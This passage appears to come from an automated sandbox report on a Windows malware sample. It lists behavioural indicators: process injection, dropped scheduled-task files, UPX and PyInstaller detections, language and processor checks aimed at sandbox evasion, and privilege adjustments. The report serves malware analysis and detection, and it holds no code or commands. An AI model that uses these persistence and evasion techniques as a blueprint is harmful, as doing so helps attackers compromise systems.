description pid Process procid_target PID 4236 set thread context of 4508 4236 7aencsM.exe 124 PID 2156 set thread context of 4936 2156 con12312211221.exe 149 PID 5836 set thread context of 5964 5836 monthdragon.exe 162 PID 5896 set thread context of 1996 5896 Bjkm5hE.exe 180 PID 6024 set thread context of 1660 6024 alex12112.exe 189 PID 5948 set thread context of 5756 5948 Ta3ZyUR.exe 195 PID 4748 set thread context of 720 4748 e64ecd84aa.exe 207 PID 5792 set thread context of 2852 5792 468d16e1f1.exe 211 PID 5348 set thread context of 4396 5348 552ed52fd7.exe 212 -
resource yara_rule behavioral2/files/0x0007000000023d6e-450.dat upx behavioral2/memory/1660-454-0x00007FF9AD1B0000-0x00007FF9AD799000-memory.dmp upx behavioral2/files/0x0007000000023d6a-463.dat upx behavioral2/memory/1660-477-0x00007FF9C4F60000-0x00007FF9C4F6F000-memory.dmp upx behavioral2/memory/1660-476-0x00007FF9C0590000-0x00007FF9C05B3000-memory.dmp upx behavioral2/memory/1660-479-0x00007FF9C0670000-0x00007FF9C067D000-memory.dmp upx behavioral2/memory/1660-480-0x00007FF9BD960000-0x00007FF9BD979000-memory.dmp upx behavioral2/memory/1660-481-0x00007FF9BCA60000-0x00007FF9BCA8D000-memory.dmp upx behavioral2/memory/1660-478-0x00007FF9C0720000-0x00007FF9C0739000-memory.dmp upx behavioral2/memory/1660-482-0x00007FF9BC8D0000-0x00007FF9BC906000-memory.dmp upx behavioral2/memory/1660-483-0x00007FF9BDBC0000-0x00007FF9BDBCD000-memory.dmp upx behavioral2/files/0x000b000000023d09-461.dat upx behavioral2/memory/1660-484-0x00007FF9BC840000-0x00007FF9BC873000-memory.dmp upx behavioral2/memory/1660-486-0x00007FF9AC9C0000-0x00007FF9ACA8D000-memory.dmp upx behavioral2/memory/1660-488-0x00007FF9AC4A0000-0x00007FF9AC9C0000-memory.dmp upx behavioral2/memory/1660-485-0x00007FF9AD1B0000-0x00007FF9AD799000-memory.dmp upx behavioral2/memory/1660-489-0x00007FF9AC3D0000-0x00007FF9AC49F000-memory.dmp upx behavioral2/memory/1660-490-0x00007FF9C0720000-0x00007FF9C0739000-memory.dmp upx behavioral2/memory/1660-493-0x00007FF9BCA40000-0x00007FF9BCA54000-memory.dmp upx behavioral2/memory/1660-496-0x00007FF9BC8A0000-0x00007FF9BC8C6000-memory.dmp upx behavioral2/memory/1660-499-0x00007FF9BC7F0000-0x00007FF9BC833000-memory.dmp upx behavioral2/memory/1660-498-0x00007FF9BC7D0000-0x00007FF9BC7E2000-memory.dmp upx behavioral2/memory/1660-497-0x00007FF9AC2B0000-0x00007FF9AC3CC000-memory.dmp upx behavioral2/memory/1660-495-0x00007FF9BCDE0000-0x00007FF9BCDEB000-memory.dmp upx behavioral2/memory/1660-491-0x00007FF9BC520000-0x00007FF9BC5A7000-memory.dmp upx behavioral2/memory/1660-502-0x00007FF9BC840000-0x00007FF9BC873000-memory.dmp upx behavioral2/memory/1660-508-0x00007FF9BC5F0000-0x00007FF9BC614000-memory.dmp upx behavioral2/memory/1660-506-0x00007FF9AC9C0000-0x00007FF9ACA8D000-memory.dmp upx behavioral2/memory/1660-509-0x00007FF9AC4A0000-0x00007FF9AC9C0000-memory.dmp upx behavioral2/memory/1660-512-0x00007FF9AC3D0000-0x00007FF9AC49F000-memory.dmp upx behavioral2/memory/1660-513-0x00007FF9ACEA0000-0x00007FF9ACF5C000-memory.dmp upx behavioral2/memory/1660-511-0x00007FF9BBFB0000-0x00007FF9BBFDE000-memory.dmp upx behavioral2/memory/1660-510-0x00007FF9ACF60000-0x00007FF9AD1A9000-memory.dmp upx behavioral2/memory/1660-514-0x00007FF9BBDA0000-0x00007FF9BBDCB000-memory.dmp upx behavioral2/memory/1660-571-0x00007FF9ACEA0000-0x00007FF9ACF5C000-memory.dmp upx behavioral2/memory/1660-573-0x00007FF9C4F60000-0x00007FF9C4F6F000-memory.dmp upx behavioral2/memory/1660-582-0x00007FF9BC840000-0x00007FF9BC873000-memory.dmp upx behavioral2/memory/1660-581-0x00007FF9BDBC0000-0x00007FF9BDBCD000-memory.dmp upx behavioral2/memory/1660-580-0x00007FF9BC8D0000-0x00007FF9BC906000-memory.dmp upx behavioral2/memory/1660-578-0x00007FF9BD960000-0x00007FF9BD979000-memory.dmp upx behavioral2/memory/1660-577-0x00007FF9C0670000-0x00007FF9C067D000-memory.dmp upx behavioral2/memory/1660-576-0x00007FF9C0720000-0x00007FF9C0739000-memory.dmp upx behavioral2/memory/1660-575-0x00007FF9C0590000-0x00007FF9C05B3000-memory.dmp upx behavioral2/memory/1660-574-0x00007FF9AC4A0000-0x00007FF9AC9C0000-memory.dmp upx behavioral2/memory/1660-572-0x00007FF9BBDA0000-0x00007FF9BBDCB000-memory.dmp upx behavioral2/memory/1660-569-0x00007FF9ACF60000-0x00007FF9AD1A9000-memory.dmp upx behavioral2/memory/1660-568-0x00007FF9BC5F0000-0x00007FF9BC614000-memory.dmp upx behavioral2/memory/1660-567-0x00007FF9BC7D0000-0x00007FF9BC7E2000-memory.dmp upx behavioral2/memory/1660-566-0x00007FF9BC7F0000-0x00007FF9BC833000-memory.dmp upx behavioral2/memory/1660-565-0x00007FF9AC2B0000-0x00007FF9AC3CC000-memory.dmp upx behavioral2/memory/1660-564-0x00007FF9BC8A0000-0x00007FF9BC8C6000-memory.dmp upx behavioral2/memory/1660-563-0x00007FF9BCDE0000-0x00007FF9BCDEB000-memory.dmp upx behavioral2/memory/1660-562-0x00007FF9BCA40000-0x00007FF9BCA54000-memory.dmp upx behavioral2/memory/1660-561-0x00007FF9BC520000-0x00007FF9BC5A7000-memory.dmp upx behavioral2/memory/1660-560-0x00007FF9AC3D0000-0x00007FF9AC49F000-memory.dmp upx behavioral2/memory/1660-548-0x00007FF9AD1B0000-0x00007FF9AD799000-memory.dmp upx behavioral2/memory/1660-579-0x00007FF9BCA60000-0x00007FF9BCA8D000-memory.dmp upx -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\Tasks\qjvk.job oVpNTUm.exe File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\ggffr.job oVpNTUm.exe File opened for modification C:\Windows\Tasks\ggffr.job oVpNTUm.exe File created C:\Windows\Tasks\skotes.job 5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe File created C:\Windows\Tasks\qjvk.job oVpNTUm.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x000a000000023c5c-316.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 8 IoCs
pid pid_target Process procid_target 3312 4236 WerFault.exe 122 1228 2156 WerFault.exe 146 6028 5836 WerFault.exe 160 1844 5896 WerFault.exe 177 2960 6024 WerFault.exe 187 4048 5948 WerFault.exe 194 3676 4844 WerFault.exe 210 6516 2032 WerFault.exe 218 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex12112.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 9dfd665e3d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 552ed52fd7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e64ecd84aa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 9dfd665e3d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language db6d21c192.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d74fb7ce47.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language con12312211221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 19e091b2fd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 468d16e1f1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dfc4ae4b5d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8ac9a0a6fe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 58c84746f6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aaededfc8c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3omTNLZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9dfd665e3d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex12112.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7ff0b5b35b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0f776c5c7d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3omTNLZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language oVpNTUm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ggffr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1995896c1c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qjvk.exe -
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 0f776c5c7d.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dfc4ae4b5d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 dfc4ae4b5d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 0f776c5c7d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2696 timeout.exe 5728 timeout.exe -
Enumerates system info in registry 2 TTPs 16 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 2628 taskkill.exe 2968 taskkill.exe 5988 taskkill.exe 5444 taskkill.exe 5528 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133844113108173891" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 916 schtasks.exe 884 schtasks.exe 5032 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4488 5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe 4488 5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe 4740 skotes.exe 4740 skotes.exe 3404 oVpNTUm.exe 3404 oVpNTUm.exe 1436 powershell.exe 1436 powershell.exe 3036 TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE 3036 TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE 2336 powershell.exe 2336 powershell.exe 2020 powershell.exe 2756 3omTNLZ.exe 2756 3omTNLZ.exe 2020 powershell.exe 3036 TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE 3036 TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE 3404 oVpNTUm.exe 3404 oVpNTUm.exe 2388 powershell.exe 2388 powershell.exe 2756 3omTNLZ.exe 2756 3omTNLZ.exe 2756 3omTNLZ.exe 2756 3omTNLZ.exe 4660 qjvk.exe 4660 qjvk.exe 2160 powershell.exe 2160 powershell.exe 2160 powershell.exe 4020 483d2fa8a0d53818306efeb32d3.exe 4020 483d2fa8a0d53818306efeb32d3.exe 1240 d74fb7ce47.exe 1240 d74fb7ce47.exe 5084 3omTNLZ.exe 5084 3omTNLZ.exe 5084 3omTNLZ.exe 5084 3omTNLZ.exe 5084 3omTNLZ.exe 5084 3omTNLZ.exe 4508 7aencsM.exe 4508 7aencsM.exe 4508 7aencsM.exe 4508 7aencsM.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 4020 powershell.exe 4020 powershell.exe 4020 powershell.exe 3628 oVpNTUm.exe 3628 oVpNTUm.exe 2296 DTQCxXZ.exe 2296 DTQCxXZ.exe 2296 DTQCxXZ.exe 2296 DTQCxXZ.exe 4936 con12312211221.exe 4936 con12312211221.exe 4936 con12312211221.exe 4936 con12312211221.exe 5476 powershell.exe 5476 powershell.exe 5476 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
pid Process 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5532 chrome.exe 5532 chrome.exe 5532 chrome.exe 5188 msedge.exe 5188 msedge.exe 5188 msedge.exe 5188 msedge.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
description pid Process Token: SeDebugPrivilege 1436 powershell.exe Token: SeDebugPrivilege 2336 powershell.exe Token: SeDebugPrivilege 2020 powershell.exe Token: SeDebugPrivilege 3036 TempGKYN6U3NW15NEHJK4LOAXWN4LUYXLSJI.EXE Token: SeDebugPrivilege 2388 powershell.exe Token: SeDebugPrivilege 2160 powershell.exe Token: SeDebugPrivilege 4020 powershell.exe Token: SeShutdownPrivilege 2896 chrome.exe Token: SeCreatePagefilePrivilege 2896 chrome.exe Token: SeShutdownPrivilege 2896 chrome.exe Token: SeCreatePagefilePrivilege 2896 chrome.exe Token: SeShutdownPrivilege 2896 chrome.exe Token: SeCreatePagefilePrivilege 2896 chrome.exe Token: SeDebugPrivilege 5476 powershell.exe Token: SeShutdownPrivilege 2896 chrome.exe Token: SeCreatePagefilePrivilege 2896 chrome.exe Token: SeShutdownPrivilege 2896 chrome.exe Token: SeCreatePagefilePrivilege 2896 chrome.exe Token: SeDebugPrivilege 5848 powershell.exe Token: SeShutdownPrivilege 2896 chrome.exe Token: SeCreatePagefilePrivilege 2896 chrome.exe Token: SeShutdownPrivilege 2896 chrome.exe Token: SeCreatePagefilePrivilege 2896 chrome.exe Token: SeDebugPrivilege 5284 C3hYpvm.exe Token: SeDebugPrivilege 1460 683611a9bc.exe Token: SeDebugPrivilege 2628 taskkill.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeShutdownPrivilege 5532 chrome.exe Token: SeCreatePagefilePrivilege 5532 chrome.exe Token: SeDebugPrivilege 2968 taskkill.exe Token: SeDebugPrivilege 5988 taskkill.exe Token: SeDebugPrivilege 5444 taskkill.exe Token: SeDebugPrivilege 5904 powershell.exe Token: SeDebugPrivilege 5528 taskkill.exe Token: SeDebugPrivilege 2628 firefox.exe Token: SeDebugPrivilege 2628 firefox.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4488 5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe 3076 19e091b2fd.exe 3076 19e091b2fd.exe 3076 19e091b2fd.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 2896 chrome.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 5444 msedge.exe 4780 9dfd665e3d.exe 4780 9dfd665e3d.exe 5532 chrome.exe 5532 chrome.exe 5532 chrome.exe 5532 chrome.exe 5532 chrome.exe 5532 chrome.exe 5532 chrome.exe -
Suspicious use of SendNotifyMessage 38 IoCs
pid Process 3076 19e091b2fd.exe 3076 19e091b2fd.exe 3076 19e091b2fd.exe 4780 9dfd665e3d.exe 4780 9dfd665e3d.exe 4780 9dfd665e3d.exe 4780 9dfd665e3d.exe 4780 9dfd665e3d.exe 632 1995896c1c.exe 4780 9dfd665e3d.exe 632 1995896c1c.exe 632 1995896c1c.exe 4780 9dfd665e3d.exe 4780 9dfd665e3d.exe 2628 firefox.exe 2628 firefox.exe 2628 firefox.exe 2628 firefox.exe 2628 firefox.exe 2628 firefox.exe 2628 firefox.exe 2628 firefox.exe 2628 firefox.exe 2628 firefox.exe 2628 firefox.exe 2628 firefox.exe 2628 firefox.exe 2628 firefox.exe 2628 firefox.exe 2628 firefox.exe 2628 firefox.exe 2628 firefox.exe 2628 firefox.exe 2628 firefox.exe 4780 9dfd665e3d.exe 4780 9dfd665e3d.exe 4780 9dfd665e3d.exe 4780 9dfd665e3d.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 5284 C3hYpvm.exe 2628 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4488 wrote to memory of 4740 4488 5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe 89 PID 4488 wrote to memory of 4740 4488 5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe 89 PID 4488 wrote to memory of 4740 4488 5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0.exe 89 PID 4740 wrote to memory of 3404 4740 skotes.exe 90 PID 4740 wrote to memory of 3404 4740 skotes.exe 90 PID 4740 wrote to memory of 3404 4740 skotes.exe 90 PID 4740 wrote to memory of 3076 4740 skotes.exe 91 PID 4740 wrote to memory of 3076 4740 skotes.exe 91 PID 4740 wrote to memory of 3076 4740 skotes.exe 91 PID 3076 wrote to memory of 2268 3076 19e091b2fd.exe 92 PID 3076 wrote to memory of 2268 3076 19e091b2fd.exe 92 PID 3076 wrote to memory of 2268 3076 19e091b2fd.exe 92 PID 3076 wrote to memory of 1748 3076 19e091b2fd.exe 93 PID 3076 wrote to memory of 1748 3076 19e091b2fd.exe 93 PID 3076 wrote to memory of 1748 3076 19e091b2fd.exe 93 PID 2268 wrote to memory of 884 2268 cmd.exe 95 PID 2268 wrote to memory of 884 2268 cmd.exe 95 PID 2268 wrote to memory of 884 2268 cmd.exe 95 PID 1748 wrote to memory of 1436 1748 mshta.exe 96 PID 1748 wrote to memory of 1436 1748 mshta.exe 96 PID 1748 wrote to memory of 1436 1748 mshta.exe 96 PID 4740 wrote to memory of 1380 4740 skotes.exe 98 PID 4740 wrote to memory of 1380 4740 skotes.exe 98 PID 4740 wrote to memory of 1380 4740 skotes.exe 98 PID 1380 wrote to memory of 4976 1380 cmd.exe 100 PID 1380 wrote to memory of 4976 1380 cmd.exe 100 PID 1380 wrote to memory of 4976 1380 cmd.exe 100 PID 4976 wrote to memory of 2696 4976 cmd.exe 102 PID 4976 wrote to memory of 2696 4976 cmd.exe 102 PID 4976 wrote to memory of 2696 4976 cmd.exe 102 PID 1436 wrote to memory of 3036 1436 powershell.exe 103 PID 1436 wrote to memory of 3036 1436 powershell.exe 103 PID 1436 wrote to memory of 3036 1436 powershell.exe 103 PID 4976 wrote to memory of 4692 4976 cmd.exe 104 PID 4976 wrote to memory of 4692 4976 cmd.exe 104 PID 4976 wrote to memory of 4692 4976 cmd.exe 104 PID 4692 wrote to memory of 2336 4692 cmd.exe 105 PID 4692 wrote to memory of 2336 4692 cmd.exe 105 PID 4692 wrote to memory of 2336 4692 cmd.exe 105 PID 4740 wrote to memory of 2756 4740 skotes.exe 106 PID 4740 wrote to memory of 2756 4740 skotes.exe 106 PID 4740 wrote to memory of 2756 4740 skotes.exe 106 PID 4976 wrote to memory of 1240 4976 cmd.exe 107 PID 4976 wrote to memory of 1240 4976 cmd.exe 107 PID 4976 wrote to memory of 1240 4976 cmd.exe 107 PID 1240 wrote to memory of 2020 1240 cmd.exe 108 PID 1240 wrote to memory of 2020 1240 cmd.exe 108 PID 1240 wrote to memory of 2020 1240 cmd.exe 108 PID 4976 wrote to memory of 4352 4976 cmd.exe 109 PID 4976 wrote to memory of 4352 4976 cmd.exe 109 PID 4976 wrote to memory of 4352 4976 cmd.exe 109 PID 4352 wrote to memory of 2388 4352 cmd.exe 110 PID 4352 wrote to memory of 2388 4352 cmd.exe 110 PID 4352 wrote to memory of 2388 4352 cmd.exe 110 PID 4976 wrote to memory of 5032 4976 cmd.exe 113 PID 4976 wrote to memory of 5032 4976 cmd.exe 113 PID 4976 wrote to memory of 5032 4976 cmd.exe 113 PID 4976 wrote to memory of 3936 4976 cmd.exe 114 PID 4976 wrote to memory of 3936 4976 cmd.exe 114 PID 4976 wrote to memory of 3936 4976 cmd.exe 114 PID 3936 wrote to memory of 2160 3936 mshta.exe 115 PID 3936 wrote to memory of 2160 3936 mshta.exe 115 PID 3936 wrote to memory of 2160 3936 mshta.exe 115 PID 4740 wrote to memory of 4324 4740 skotes.exe 117 -
Uses Task Scheduler COM API 1 TTPs
